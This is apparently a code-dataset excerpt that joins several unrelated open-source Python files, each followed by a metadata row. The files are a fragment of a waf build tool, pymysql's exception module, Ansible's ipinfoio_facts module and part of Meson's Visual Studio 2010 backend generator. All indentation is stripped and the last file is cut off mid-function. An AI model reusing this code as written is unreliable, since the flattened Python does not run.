code = tsk.inputs[0].read() #Utils.readf(infile)
# replace all % by %% to prevent errors by % signs in the input file while string formatting
code = code.replace('%', '%%')
s = m4_re.sub(r'%(\1)s', code)
env = tsk.env
di = getattr(tsk, 'dict', {}) or getattr(tsk.generator, 'dict', {})
if not di:
names = m4_re.findall(code)
for i in names:
di[i] = env.get_flat(i) or env.get_flat(i.upper())
tsk.outputs[0].write(s % di)
@feature('subst')
@before_method('process_source')
def apply_subst(self):
Utils.def_attrs(self, fun=subst_func)
lst = self.to_list(self.source)
self.meths.remove('process_source')
self.dict = getattr(self, 'dict', {})
for filename in lst:
node = self.path.find_resource(filename)
if not node: raise Errors.WafError('cannot find input file %s for processing' % filename)
if self.target:
newnode = self.path.find_or_declare(self.target)
else:
newnode = node.change_ext('')
try:
self.dict = self.dict.get_merged_dict()
except AttributeError:
pass
if self.dict and not self.env['DICT_HASH']:
self.env = self.env.derive()
keys = list(self.dict.keys())
keys.sort()
lst = [self.dict[x] for x in keys]
self.env['DICT_HASH'] = str(Utils.h_list(lst))
tsk = self.create_task('copy', node, newnode)
tsk.fun = self.fun
tsk.dict = self.dict
tsk.dep_vars = ['DICT_HASH']
tsk.chmod = getattr(self, 'chmod', Utils.O644)
if not tsk.env:
tsk.debug()
raise Errors.WafError('task without an environment')
####################
## command-output ####
####################
class cmd_arg(object):
"""command-output arguments for representing files or folders"""
def __init__(self, name, template='%s'):
self.name = name
self.template = template
self.node = None
class input_file(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_resource(self.name)
if self.node is None:
raise Errors.WafError("Input file %s not found in " % (self.name, base_path))
def get_path(self, env, absolute):
if absolute:
return self.template % self.node.abspath()
else:
return self.template % self.node.srcpath()
class output_file(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_or_declare(self.name)
if self.node is None:
raise Errors.WafError("Output file %s not found in " % (self.name, base_path))
def get_path(self, env, absolute):
if absolute:
return self.template % self.node.abspath()
else:
return self.template % self.node.bldpath()
class cmd_dir_arg(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_dir(self.name)
if self.node is None:
raise Errors.WafError("Directory %s not found in " % (self.name, base_path))
class input_dir(cmd_dir_arg):
def get_path(self, dummy_env, dummy_absolute):
return self.template % self.node.abspath()
class output_dir(cmd_dir_arg):
def get_path(self, env, dummy_absolute):
return self.template % self.node.abspath()
class command_output(Task.Task):
color = "BLUE"
def __init__(self, env, command, command_node, command_args, stdin, stdout, cwd, os_env, stderr):
Task.Task.__init__(self, env=env)
assert isinstance(command, (str, Node.Node))
self.command = command
self.command_args = command_args
self.stdin = stdin
self.stdout = stdout
self.cwd = cwd
self.os_env = os_env
self.stderr = stderr
if command_node is not None: self.dep_nodes = [command_node]
self.dep_vars = [] # additional environment variables to look
def run(self):
task = self
#assert len(task.inputs) > 0
def input_path(node, template):
if task.cwd is None:
return template % node.bldpath()
else:
return template % node.abspath()
def output_path(node, template):
fun = node.abspath
if task.cwd is None: fun = node.bldpath
return template % fun()
if isinstance(task.command, Node.Node):
argv = [input_path(task.command, '%s')]
else:
argv = [task.command]
for arg in task.command_args:
if isinstance(arg, str):
argv.append(arg)
else:
assert isinstance(arg, cmd_arg)
argv.append(arg.get_path(task.env, (task.cwd is not None)))
if task.stdin:
stdin = open(input_path(task.stdin, '%s'))
else:
stdin = None
if task.stdout:
stdout = open(output_path(task.stdout, '%s'), "w")
else:
stdout = None
if task.stderr:
stderr = open(output_path(task.stderr, '%s'), "w")
else:
stderr = None
if task.cwd is None:
cwd = ('None (actually %r)' % os.getcwd())
else:
cwd = repr(task.cwd)
debug("command-output: cwd=%s, stdin=%r, stdout=%r, argv=%r" %
(cwd, stdin, stdout, argv))
if task.os_env is None:
os_env = os.environ
else:
os_env = task.os_env
command = Utils.subprocess.Popen(argv, stdin=stdin, stdout=stdout, stderr=stderr, cwd=task.cwd, env=os_env)
return command.wait()
@feature('command-output')
def init_cmd_output(self):
Utils.def_attrs(self,
stdin = None,
stdout = None,
stderr = None,
# the command to execute
command = None,
# whether it is an external command; otherwise it is assumed
# to be an executable binary or script that lives in the
# source or build tree.
command_is_external = False,
# extra parameters (argv) to pass to the command (excluding
# the command itself)
argv = [],
# dependencies to other objects -> this is probably not what you want (ita)
# values must be 'task_gen' instances (not names!)
dependencies = [],
# dependencies on env variable contents
dep_vars = [],
# input files that are implicit, i.e. they are not
# stdin, nor are they mentioned explicitly in argv
hidden_inputs = [],
# output files that are implicit, i.e. they are not
# stdout, nor are they mentioned explicitly in argv
hidden_outputs = [],
# change the subprocess to this cwd (must use obj.input_dir() or output_dir() here)
cwd = None,
# OS environment variables to pass to the subprocess
# if None, use the default environment variables unchanged
os_env = None)
@feature('command-output')
@after_method('init_cmd_output')
def apply_cmd_output(self):
if self.command is None:
raise Errors.WafError("command-output missing command")
if self.command_is_external:
cmd = self.command
cmd_node = None
else:
cmd_node = self.path.find_resource(self.command)
assert cmd_node is not None, ('''Could not find command '%s' in source tree.
Hint: if this is an external command,
use command_is_external=True''') % (self.command,)
cmd = cmd_node
if self.cwd is None:
cwd = None
else:
assert isinstance(cwd, CmdDirArg)
self.cwd.find_node(self.path)
args = []
inputs = []
outputs = []
for arg in self.argv:
if isinstance(arg, cmd_arg):
arg.find_node(self.path)
if isinstance(arg, input_file):
inputs.append(arg.node)
if isinstance(arg, output_file):
outputs.append(arg.node)
if self.stdout is None:
stdout = None
else:
assert isinstance(self.stdout, str)
stdout = self.path.find_or_declare(self.stdout)
if stdout is None:
raise Errors.WafError("File %s not found" % (self.stdout,))
outputs.append(stdout)
if self.stderr is None:
stderr = None
else:
assert isinstance(self.stderr, str)
stderr = self.path.find_or_declare(self.stderr)
if stderr is None:
raise Errors.WafError("File %s not found" % (self.stderr,))
outputs.append(stderr)
if self.stdin is None:
stdin = None
else:
assert isinstance(self.stdin, str)
stdin = self.path.find_resource(self.stdin)
if stdin is None:
raise Errors.WafError("File %s not found" % (self.stdin,))
inputs.append(stdin)
for hidden_input in self.to_list(self.hidden_inputs):
node = self.path.find_resource(hidden_input)
if node is None:
raise Errors.WafError("File %s not found in dir %s" % (hidden_input, self.path))
inputs.append(node)
for hidden_output in self.to_list(self.hidden_outputs):
node = self.path.find_or_declare(hidden_output)
if node is None:
raise Errors.WafError("File %s not found in dir %s" % (hidden_output, self.path))
outputs.append(node)
if not (inputs or getattr(self, 'no_inputs', None)):
raise Errors.WafError('command-output objects must have at least one input file or give self.no_inputs')
if not (outputs or getattr(self, 'no_outputs', None)):
raise Errors.WafError('command-output objects must have at least one output file or give self.no_outputs')
cwd = self.bld.variant_dir
task = command_output(self.env, cmd, cmd_node, self.argv, stdin, stdout, cwd, self.os_env, stderr)
task.generator = self
copy_attrs(self, task, 'before after ext_in ext_out', only_if_set=True)
self.tasks.append(task)
task.inputs = inputs
task.outputs = outputs
task.dep_vars = self.to_list(self.dep_vars)
for dep in self.dependencies:
assert dep is not self
dep.post()
for dep_task in dep.tasks:
task.set_run_after(dep_task)
if not task.inputs:
# the case for svnversion, always run, and update the output nodes
task.runnable_status = type(Task.TaskBase.run)(runnable_status, task, task.__class__) # always run
task.post_run = type(Task.TaskBase.run)(post_run, task, task.__class__)
# TODO the case with no outputs?
def post_run(self):
for x in self.outputs:
x.sig = Utils.h_file(x.abspath())
def runnable_status(self):
return self.RUN_ME
Task.task_factory('copy', vars=[], func=action_process_file_func)
| gpl-2.0 | -2,328,467,615,840,488,400 | 27.223558 | 116 | 0.686909 | false |
nickster5001/ctracker | flask/lib/python3.4/site-packages/pymysql/err.py | 4 | 4306 | import struct
try:
Exception, Warning
except ImportError:
try:
from exceptions import Exception, Warning
except ImportError:
import sys
e = sys.modules['exceptions']
Exception = e.Exception
Warning = e.Warning
from .constants import ER
import sys
class MySQLError(Exception):
"""Exception related to operation with MySQL."""
class Warning(Warning, MySQLError):
"""Exception raised for important warnings like data truncations
while inserting, etc."""
class Error(MySQLError):
"""Exception that is the base class of all other error exceptions
(not Warning)."""
class InterfaceError(Error):
"""Exception raised for errors that are related to the database
interface rather than the database itself."""
class DatabaseError(Error):
"""Exception raised for errors that are related to the
database."""
class DataError(DatabaseError):
"""Exception raised for errors that are due to problems with the
processed data like division by zero, numeric value out of range,
etc."""
class OperationalError(DatabaseError):
"""Exception raised for errors that are related to the database's
operation and not necessarily under the control of the programmer,
e.g. an unexpected disconnect occurs, the data source name is not
found, a transaction could not be processed, a memory allocation
error occurred during processing, etc."""
class IntegrityError(DatabaseError):
"""Exception raised when the relational integrity of the database
is affected, e.g. a foreign key check fails, duplicate key,
etc."""
class InternalError(DatabaseError):
"""Exception raised when the database encounters an internal
error, e.g. the cursor is not valid anymore, the transaction is
out of sync, etc."""
class ProgrammingError(DatabaseError):
"""Exception raised for programming errors, e.g. table not found
or already exists, syntax error in the SQL statement, wrong number
of parameters specified, etc."""
class NotSupportedError(DatabaseError):
"""Exception raised in case a method or database API was used
which is not supported by the database, e.g. requesting a
.rollback() on a connection that does not support transaction or
has transactions turned off."""
error_map = {}
def _map_error(exc, *errors):
for error in errors:
error_map[error] = exc
_map_error(ProgrammingError, ER.DB_CREATE_EXISTS, ER.SYNTAX_ERROR,
ER.PARSE_ERROR, ER.NO_SUCH_TABLE, ER.WRONG_DB_NAME,
ER.WRONG_TABLE_NAME, ER.FIELD_SPECIFIED_TWICE,
ER.INVALID_GROUP_FUNC_USE, ER.UNSUPPORTED_EXTENSION,
ER.TABLE_MUST_HAVE_COLUMNS, ER.CANT_DO_THIS_DURING_AN_TRANSACTION)
_map_error(DataError, ER.WARN_DATA_TRUNCATED, ER.WARN_NULL_TO_NOTNULL,
ER.WARN_DATA_OUT_OF_RANGE, ER.NO_DEFAULT, ER.PRIMARY_CANT_HAVE_NULL,
ER.DATA_TOO_LONG, ER.DATETIME_FUNCTION_OVERFLOW)
_map_error(IntegrityError, ER.DUP_ENTRY, ER.NO_REFERENCED_ROW,
ER.NO_REFERENCED_ROW_2, ER.ROW_IS_REFERENCED, ER.ROW_IS_REFERENCED_2,
ER.CANNOT_ADD_FOREIGN)
_map_error(NotSupportedError, ER.WARNING_NOT_COMPLETE_ROLLBACK,
ER.NOT_SUPPORTED_YET, ER.FEATURE_DISABLED, ER.UNKNOWN_STORAGE_ENGINE)
_map_error(OperationalError, ER.DBACCESS_DENIED_ERROR, ER.ACCESS_DENIED_ERROR,
ER.TABLEACCESS_DENIED_ERROR, ER.COLUMNACCESS_DENIED_ERROR)
del _map_error, ER
def _get_error_info(data):
errno = struct.unpack('<h', data[1:3])[0]
if sys.version_info[0] == 3:
is_41 = data[3] == ord("#")
else:
is_41 = data[3] == "#"
if is_41:
# version 4.1
sqlstate = data[4:9].decode("utf8")
errorvalue = data[9:].decode("utf8")
return (errno, sqlstate, errorvalue)
else:
# version 4.0
return (errno, None, data[3:].decode("utf8"))
def _check_mysql_exception(errinfo):
errno, sqlstate, errorvalue = errinfo
errorclass = error_map.get(errno, None)
if errorclass:
raise errorclass(errno,errorvalue)
# couldn't find the right error number
raise InternalError(errno, errorvalue)
def raise_mysql_exception(data):
errinfo = _get_error_info(data)
_check_mysql_exception(errinfo)
| mit | 7,623,619,764,364,948,000 | 28.292517 | 80 | 0.686716 | false |
andreaso/ansible | lib/ansible/modules/net_tools/ipinfoio_facts.py | 50 | 4074 | #!/usr/bin/python
#
# (c) 2016, Aleksei Kostiuk <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ipinfoio_facts
short_description: "Retrieve IP geolocation facts of a host's IP address"
description:
- "Gather IP geolocation facts of a host's IP address using ipinfo.io API"
version_added: "2.3"
author: "Aleksei Kostiuk (@akostyuk)"
options:
timeout:
description:
- HTTP connection timeout in seconds
required: false
default: 10
http_agent:
description:
- Set http user agent
required: false
default: "ansible-ipinfoio-module/0.0.1"
notes:
- "Check http://ipinfo.io/ for more information"
'''
EXAMPLES = '''
# Retrieve geolocation data of a host's IP address
- name: get IP geolocation data
ipinfoio_facts:
'''
RETURN = '''
ansible_facts:
description: "Dictionary of ip geolocation facts for a host's IP address"
returned: changed
type: complex
contains:
ip:
description: "Public IP address of a host"
type: string
sample: "8.8.8.8"
hostname:
description: Domain name
type: string
sample: "google-public-dns-a.google.com"
country:
description: ISO 3166-1 alpha-2 country code
type: string
sample: "US"
region:
description: State or province name
type: string
sample: "California"
city:
description: City name
type: string
sample: "Mountain View"
loc:
description: Latitude and Longitude of the location
type: string
sample: "37.3860,-122.0838"
org:
description: "organization's name"
type: string
sample: "AS3356 Level 3 Communications, Inc."
postal:
description: Postal code
type: string
sample: "94035"
'''
USER_AGENT = 'ansible-ipinfoio-module/0.0.1'
class IpinfoioFacts(object):
def __init__(self, module):
self.url = 'https://ipinfo.io/json'
self.timeout = module.params.get('timeout')
self.module = module
def get_geo_data(self):
response, info = fetch_url(self.module, self.url, force=True, # NOQA
timeout=self.timeout)
try:
info['status'] == 200
except AssertionError:
self.module.fail_json(msg='Could not get {} page, '
'check for connectivity!'.format(self.url))
else:
try:
content = response.read()
result = self.module.from_json(content.decode('utf8'))
except ValueError:
self.module.fail_json(
msg='Failed to parse the ipinfo.io response: '
'{0} {1}'.format(self.url, content))
else:
return result
def main():
module = AnsibleModule( # NOQA
argument_spec=dict(
http_agent=dict(default=USER_AGENT),
timeout=dict(type='int', default=10),
),
supports_check_mode=True,
)
ipinfoio = IpinfoioFacts(module)
ipinfoio_result = dict(
changed=False, ansible_facts=ipinfoio.get_geo_data())
module.exit_json(**ipinfoio_result)
from ansible.module_utils.basic import * # NOQA
from ansible.module_utils.urls import * # NOQA
if __name__ == '__main__':
main()
| gpl-3.0 | 5,952,106,428,594,388,000 | 27.690141 | 77 | 0.62273 | false |
QuLogic/meson | mesonbuild/backend/vs2010backend.py | 1 | 81951 | # Copyright 2014-2016 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import os
import xml.dom.minidom
import xml.etree.ElementTree as ET
import uuid
import typing as T
from pathlib import Path, PurePath
from . import backends
from .. import build
from .. import dependencies
from .. import mlog
from .. import compilers
from ..interpreter import Interpreter
from ..mesonlib import (
MesonException, python_command, replace_if_different, OptionKey,
)
from ..environment import Environment, build_filename
def autodetect_vs_version(build: T.Optional[build.Build], interpreter: T.Optional[Interpreter]):
vs_version = os.getenv('VisualStudioVersion', None)
vs_install_dir = os.getenv('VSINSTALLDIR', None)
if not vs_install_dir:
raise MesonException('Could not detect Visual Studio: Environment variable VSINSTALLDIR is not set!\n'
'Are you running meson from the Visual Studio Developer Command Prompt?')
# VisualStudioVersion is set since Visual Studio 12.0, but sometimes
# vcvarsall.bat doesn't set it, so also use VSINSTALLDIR
if vs_version == '14.0' or 'Visual Studio 14' in vs_install_dir:
from mesonbuild.backend.vs2015backend import Vs2015Backend
return Vs2015Backend(build, interpreter)
if vs_version == '15.0' or 'Visual Studio 17' in vs_install_dir or \
'Visual Studio\\2017' in vs_install_dir:
from mesonbuild.backend.vs2017backend import Vs2017Backend
return Vs2017Backend(build, interpreter)
if vs_version == '16.0' or 'Visual Studio 19' in vs_install_dir or \
'Visual Studio\\2019' in vs_install_dir:
from mesonbuild.backend.vs2019backend import Vs2019Backend
return Vs2019Backend(build, interpreter)
if 'Visual Studio 10.0' in vs_install_dir:
return Vs2010Backend(build, interpreter)
raise MesonException('Could not detect Visual Studio using VisualStudioVersion: {!r} or VSINSTALLDIR: {!r}!\n'
'Please specify the exact backend to use.'.format(vs_version, vs_install_dir))
def split_o_flags_args(args):
"""
Splits any /O args and returns them. Does not take care of flags overriding
previous ones. Skips non-O flag arguments.
['/Ox', '/Ob1'] returns ['/Ox', '/Ob1']
['/Oxj', '/MP'] returns ['/Ox', '/Oj']
"""
o_flags = []
for arg in args:
if not arg.startswith('/O'):
continue
flags = list(arg[2:])
# Assume that this one can't be clumped with the others since it takes
# an argument itself
if 'b' in flags:
o_flags.append(arg)
else:
o_flags += ['/O' + f for f in flags]
return o_flags
def generate_guid_from_path(path, path_type):
return str(uuid.uuid5(uuid.NAMESPACE_URL, 'meson-vs-' + path_type + ':' + str(path))).upper()
class Vs2010Backend(backends.Backend):
def __init__(self, build: T.Optional[build.Build], interpreter: T.Optional[Interpreter]):
super().__init__(build, interpreter)
self.name = 'vs2010'
self.project_file_version = '10.0.30319.1'
self.platform_toolset = None
self.vs_version = '2010'
self.windows_target_platform_version = None
self.subdirs = {}
self.handled_target_deps = {}
def get_target_private_dir(self, target):
return os.path.join(self.get_target_dir(target), target.get_id())
def generate_custom_generator_commands(self, target, parent_node):
generator_output_files = []
custom_target_include_dirs = []
custom_target_output_files = []
target_private_dir = self.relpath(self.get_target_private_dir(target), self.get_target_dir(target))
down = self.target_to_build_root(target)
for genlist in target.get_generated_sources():
if isinstance(genlist, (build.CustomTarget, build.CustomTargetIndex)):
for i in genlist.get_outputs():
# Path to the generated source from the current vcxproj dir via the build root
ipath = os.path.join(down, self.get_target_dir(genlist), i)
custom_target_output_files.append(ipath)
idir = self.relpath(self.get_target_dir(genlist), self.get_target_dir(target))
if idir not in custom_target_include_dirs:
custom_target_include_dirs.append(idir)
else:
generator = genlist.get_generator()
exe = generator.get_exe()
infilelist = genlist.get_inputs()
outfilelist = genlist.get_outputs()
source_dir = os.path.join(down, self.build_to_src, genlist.subdir)
exe_arr = self.build_target_to_cmd_array(exe)
idgroup = ET.SubElement(parent_node, 'ItemGroup')
for i in range(len(infilelist)):
if len(infilelist) == len(outfilelist):
sole_output = os.path.join(target_private_dir, outfilelist[i])
else:
sole_output = ''
curfile = infilelist[i]
infilename = os.path.join(down, curfile.rel_to_builddir(self.build_to_src))
deps = self.get_custom_target_depend_files(genlist, True)
base_args = generator.get_arglist(infilename)
outfiles_rel = genlist.get_outputs_for(curfile)
outfiles = [os.path.join(target_private_dir, of) for of in outfiles_rel]
generator_output_files += outfiles
args = [x.replace("@INPUT@", infilename).replace('@OUTPUT@', sole_output)
for x in base_args]
args = self.replace_outputs(args, target_private_dir, outfiles_rel)
args = [x.replace("@SOURCE_DIR@", self.environment.get_source_dir())
.replace("@BUILD_DIR@", target_private_dir)
for x in args]
args = [x.replace("@CURRENT_SOURCE_DIR@", source_dir) for x in args]
args = [x.replace("@SOURCE_ROOT@", self.environment.get_source_dir())
.replace("@BUILD_ROOT@", self.environment.get_build_dir())
for x in args]
args = [x.replace('\\', '/') for x in args]
cmd = exe_arr + self.replace_extra_args(args, genlist)
# Always use a wrapper because MSBuild eats random characters when
# there are many arguments.
tdir_abs = os.path.join(self.environment.get_build_dir(), self.get_target_dir(target))
cmd, _ = self.as_meson_exe_cmdline(
'generator ' + cmd[0],
cmd[0],
cmd[1:],
workdir=tdir_abs,
capture=outfiles[0] if generator.capture else None,
force_serialize=True
)
deps = cmd[-1:] + deps
abs_pdir = os.path.join(self.environment.get_build_dir(), self.get_target_dir(target))
os.makedirs(abs_pdir, exist_ok=True)
cbs = ET.SubElement(idgroup, 'CustomBuild', Include=infilename)
ET.SubElement(cbs, 'Command').text = ' '.join(self.quote_arguments(cmd))
ET.SubElement(cbs, 'Outputs').text = ';'.join(outfiles)
ET.SubElement(cbs, 'AdditionalInputs').text = ';'.join(deps)
return generator_output_files, custom_target_output_files, custom_target_include_dirs
def generate(self):
target_machine = self.interpreter.builtin['target_machine'].cpu_family_method(None, None)
if target_machine == '64' or target_machine == 'x86_64':
# amd64 or x86_64
self.platform = 'x64'
elif target_machine == 'x86':
# x86
self.platform = 'Win32'
elif target_machine == 'aarch64' or target_machine == 'arm64':
target_cpu = self.interpreter.builtin['target_machine'].cpu_method(None, None)
if target_cpu == 'arm64ec':
self.platform = 'arm64ec'
else:
self.platform = 'arm64'
elif 'arm' in target_machine.lower():
self.platform = 'ARM'
else:
raise MesonException('Unsupported Visual Studio platform: ' + target_machine)
self.buildtype = self.environment.coredata.get_option(OptionKey('buildtype'))
self.optimization = self.environment.coredata.get_option(OptionKey('optimization'))
self.debug = self.environment.coredata.get_option(OptionKey('debug'))
try:
self.sanitize = self.environment.coredata.get_option(OptionKey('b_sanitize'))
except MesonException:
self.sanitize = 'none'
sln_filename = os.path.join(self.environment.get_build_dir(), self.build.project_name + '.sln')
projlist = self.generate_projects()
self.gen_testproj('RUN_TESTS', os.path.join(self.environment.get_build_dir(), 'RUN_TESTS.vcxproj'))
self.gen_installproj('RUN_INSTALL', os.path.join(self.environment.get_build_dir(), 'RUN_INSTALL.vcxproj'))
self.gen_regenproj('REGEN', os.path.join(self.environment.get_build_dir(), 'REGEN.vcxproj'))
self.generate_solution(sln_filename, projlist)
self.generate_regen_info()
Vs2010Backend.touch_regen_timestamp(self.environment.get_build_dir())
@staticmethod
def get_regen_stampfile(build_dir: str) -> None:
return os.path.join(os.path.join(build_dir, Environment.private_dir), 'regen.stamp')
@staticmethod
def touch_regen_timestamp(build_dir: str) -> None:
with open(Vs2010Backend.get_regen_stampfile(build_dir), 'w'):
pass
def get_vcvars_command(self):
has_arch_values = 'VSCMD_ARG_TGT_ARCH' in os.environ and 'VSCMD_ARG_HOST_ARCH' in os.environ
# Use vcvarsall.bat if we found it.
if 'VCINSTALLDIR' in os.environ:
vs_version = os.environ['VisualStudioVersion'] \
if 'VisualStudioVersion' in os.environ else None
relative_path = 'Auxiliary\\Build\\' if vs_version >= '15.0' else ''
script_path = os.environ['VCINSTALLDIR'] + relative_path + 'vcvarsall.bat'
if os.path.exists(script_path):
if has_arch_values:
target_arch = os.environ['VSCMD_ARG_TGT_ARCH']
host_arch = os.environ['VSCMD_ARG_HOST_ARCH']
else:
target_arch = os.environ.get('Platform', 'x86')
host_arch = target_arch
arch = host_arch + '_' + target_arch if host_arch != target_arch else target_arch
return f'"{script_path}" {arch}'
# Otherwise try the VS2017 Developer Command Prompt.
if 'VS150COMNTOOLS' in os.environ and has_arch_values:
script_path = os.environ['VS150COMNTOOLS'] + 'VsDevCmd.bat'
if os.path.exists(script_path):
return '"%s" -arch=%s -host_arch=%s' % \
(script_path, os.environ['VSCMD_ARG_TGT_ARCH'], os.environ['VSCMD_ARG_HOST_ARCH'])
return ''
def get_obj_target_deps(self, obj_list):
result = {}
for o in obj_list:
if isinstance(o, build.ExtractedObjects):
result[o.target.get_id()] = o.target
return result.items()
def get_target_deps(self, t, recursive=False):
all_deps = {}
for target in t.values():
if isinstance(target, build.CustomTarget):
for d in target.get_target_dependencies():
all_deps[d.get_id()] = d
elif isinstance(target, build.RunTarget):
for d in target.get_dependencies():
all_deps[d.get_id()] = d
elif isinstance(target, build.BuildTarget):
for ldep in target.link_targets:
if isinstance(ldep, build.CustomTargetIndex):
all_deps[ldep.get_id()] = ldep.target
else:
all_deps[ldep.get_id()] = ldep
for ldep in target.link_whole_targets:
if isinstance(ldep, build.CustomTargetIndex):
all_deps[ldep.get_id()] = ldep.target
else:
all_deps[ldep.get_id()] = ldep
for obj_id, objdep in self.get_obj_target_deps(target.objects):
all_deps[obj_id] = objdep
else:
raise MesonException('Unknown target type for target %s' % target)
for gendep in target.get_generated_sources():
if isinstance(gendep, build.CustomTarget):
all_deps[gendep.get_id()] = gendep
elif isinstance(gendep, build.CustomTargetIndex):
all_deps[gendep.target.get_id()] = gendep.target
else:
generator = gendep.get_generator()
gen_exe = generator.get_exe()
if isinstance(gen_exe, build.Executable):
all_deps[gen_exe.get_id()] = gen_exe
for d in generator.depends:
if isinstance(d, build.CustomTargetIndex):
all_deps[d.get_id()] = d.target
else:
all_deps[d.get_id()] = d
if not t or not recursive:
return all_deps
ret = self.get_target_deps(all_deps, recursive)
ret.update(all_deps)
return ret
def generate_solution_dirs(self, ofile, parents):
prj_templ = 'Project("{%s}") = "%s", "%s", "{%s}"\n'
iterpaths = reversed(parents)
# Skip first path
next(iterpaths)
for path in iterpaths:
if path not in self.subdirs:
basename = path.name
identifier = generate_guid_from_path(path, 'subdir')
# top-level directories have None as their parent_dir
parent_dir = path.parent
parent_identifier = self.subdirs[parent_dir][0] \
if parent_dir != PurePath('.') else None
self.subdirs[path] = (identifier, parent_identifier)
prj_line = prj_templ % (
self.environment.coredata.lang_guids['directory'],
basename, basename, self.subdirs[path][0])
ofile.write(prj_line)
ofile.write('EndProject\n')
def generate_solution(self, sln_filename, projlist):
default_projlist = self.get_build_by_default_targets()
sln_filename_tmp = sln_filename + '~'
with open(sln_filename_tmp, 'w', encoding='utf-8') as ofile:
ofile.write('Microsoft Visual Studio Solution File, Format '
'Version 11.00\n')
ofile.write('# Visual Studio ' + self.vs_version + '\n')
prj_templ = 'Project("{%s}") = "%s", "%s", "{%s}"\n'
for prj in projlist:
coredata = self.environment.coredata
if coredata.get_option(OptionKey('layout')) == 'mirror':
self.generate_solution_dirs(ofile, prj[1].parents)
target = self.build.targets[prj[0]]
lang = 'default'
if hasattr(target, 'compilers') and target.compilers:
for lang_out in target.compilers.keys():
lang = lang_out
break
prj_line = prj_templ % (
self.environment.coredata.lang_guids[lang],
prj[0], prj[1], prj[2])
ofile.write(prj_line)
target_dict = {target.get_id(): target}
# Get recursive deps
recursive_deps = self.get_target_deps(
target_dict, recursive=True)
ofile.write('EndProject\n')
for dep, target in recursive_deps.items():
if prj[0] in default_projlist:
default_projlist[dep] = target
test_line = prj_templ % (self.environment.coredata.lang_guids['default'],
'RUN_TESTS', 'RUN_TESTS.vcxproj',
self.environment.coredata.test_guid)
ofile.write(test_line)
ofile.write('EndProject\n')
regen_line = prj_templ % (self.environment.coredata.lang_guids['default'],
'REGEN', 'REGEN.vcxproj',
self.environment.coredata.regen_guid)
ofile.write(regen_line)
ofile.write('EndProject\n')
install_line = prj_templ % (self.environment.coredata.lang_guids['default'],
'RUN_INSTALL', 'RUN_INSTALL.vcxproj',
self.environment.coredata.install_guid)
ofile.write(install_line)
ofile.write('EndProject\n')
ofile.write('Global\n')
ofile.write('\tGlobalSection(SolutionConfigurationPlatforms) = '
'preSolution\n')
ofile.write('\t\t%s|%s = %s|%s\n' %
(self.buildtype, self.platform, self.buildtype,
self.platform))
ofile.write('\tEndGlobalSection\n')
ofile.write('\tGlobalSection(ProjectConfigurationPlatforms) = '
'postSolution\n')
ofile.write('\t\t{%s}.%s|%s.ActiveCfg = %s|%s\n' %
(self.environment.coredata.regen_guid, self.buildtype,
self.platform, self.buildtype, self.platform))
ofile.write('\t\t{%s}.%s|%s.Build.0 = %s|%s\n' %
(self.environment.coredata.regen_guid, self.buildtype,
self.platform, self.buildtype, self.platform))
# Create the solution configuration
for p in projlist:
# Add to the list of projects in this solution
ofile.write('\t\t{%s}.%s|%s.ActiveCfg = %s|%s\n' %
(p[2], self.buildtype, self.platform,
self.buildtype, self.platform))
if p[0] in default_projlist and \
not isinstance(self.build.targets[p[0]], build.RunTarget):
# Add to the list of projects to be built
ofile.write('\t\t{%s}.%s|%s.Build.0 = %s|%s\n' %
(p[2], self.buildtype, self.platform,
self.buildtype, self.platform))
ofile.write('\t\t{%s}.%s|%s.ActiveCfg = %s|%s\n' %
(self.environment.coredata.test_guid, self.buildtype,
self.platform, self.buildtype, self.platform))
ofile.write('\t\t{%s}.%s|%s.ActiveCfg = %s|%s\n' %
(self.environment.coredata.install_guid, self.buildtype,
self.platform, self.buildtype, self.platform))
ofile.write('\tEndGlobalSection\n')
ofile.write('\tGlobalSection(SolutionProperties) = preSolution\n')
ofile.write('\t\tHideSolutionNode = FALSE\n')
ofile.write('\tEndGlobalSection\n')
if self.subdirs:
ofile.write('\tGlobalSection(NestedProjects) = '
'preSolution\n')
for p in projlist:
if p[1].parent != PurePath('.'):
ofile.write("\t\t{{{}}} = {{{}}}\n".format(p[2], self.subdirs[p[1].parent][0]))
for subdir in self.subdirs.values():
if subdir[1]:
ofile.write("\t\t{{{}}} = {{{}}}\n".format(subdir[0], subdir[1]))
ofile.write('\tEndGlobalSection\n')
ofile.write('EndGlobal\n')
replace_if_different(sln_filename, sln_filename_tmp)
def generate_projects(self):
startup_project = self.environment.coredata.options[OptionKey('backend_startup_project')].value
projlist = []
startup_idx = 0
for (i, (name, target)) in enumerate(self.build.targets.items()):
if startup_project and startup_project == target.get_basename():
startup_idx = i
outdir = Path(
self.environment.get_build_dir(),
self.get_target_dir(target)
)
outdir.mkdir(exist_ok=True, parents=True)
fname = name + '.vcxproj'
target_dir = PurePath(self.get_target_dir(target))
relname = target_dir / fname
projfile_path = outdir / fname
proj_uuid = self.environment.coredata.target_guids[name]
self.gen_vcxproj(target, str(projfile_path), proj_uuid)
projlist.append((name, relname, proj_uuid))
# Put the startup project first in the project list
if startup_idx:
projlist = [projlist[startup_idx]] + projlist[0:startup_idx] + projlist[startup_idx + 1:-1]
return projlist
def split_sources(self, srclist):
sources = []
headers = []
objects = []
languages = []
for i in srclist:
if self.environment.is_header(i):
headers.append(i)
elif self.environment.is_object(i):
objects.append(i)
elif self.environment.is_source(i):
sources.append(i)
